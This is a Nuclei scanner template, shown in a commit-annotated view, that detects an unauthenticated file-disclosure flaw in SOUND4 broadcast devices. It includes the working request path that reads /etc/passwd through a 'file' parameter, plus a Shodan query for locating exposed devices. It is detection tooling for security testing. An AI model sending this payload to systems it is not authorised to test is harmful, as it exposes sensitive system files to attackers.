nuclei-templates/http/vulnerabilities/other/sound4-file-disclosure.yaml

34 lines
1.2 KiB
YAML
Raw Permalink Normal View History

2023-01-23 04:22:06 +00:00
id: sound4-file-disclosure
2023-01-22 20:24:11 +00:00
info:
2023-01-23 04:22:06 +00:00
name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
2023-01-22 20:24:11 +00:00
author: arafatansari
severity: medium
2023-01-23 04:22:06 +00:00
description: |
The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
2023-01-22 20:24:11 +00:00
reference:
- https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html
2023-01-23 04:22:06 +00:00
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php
2023-01-22 20:24:11 +00:00
metadata:
2023-10-14 11:27:55 +00:00
verified: true
max-request: 1
2023-01-22 20:24:11 +00:00
shodan-query: http.html:"SOUND4"
tags: packetstorm,lfi,sound4,unauth,disclosure
2023-01-22 20:24:11 +00:00
http:
2023-01-22 20:24:11 +00:00
- method: GET
path:
- "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4b0a00483046022100aaecc92b917e62040941e386c4512db7ce6f63abe572507958c46788ffdcf7760221008ff8df032e8cbd8512736e2bca47ef43f12d738c8a2eb1058756c3c3106e5dec:922c64590222798bb761d5b6d8e72950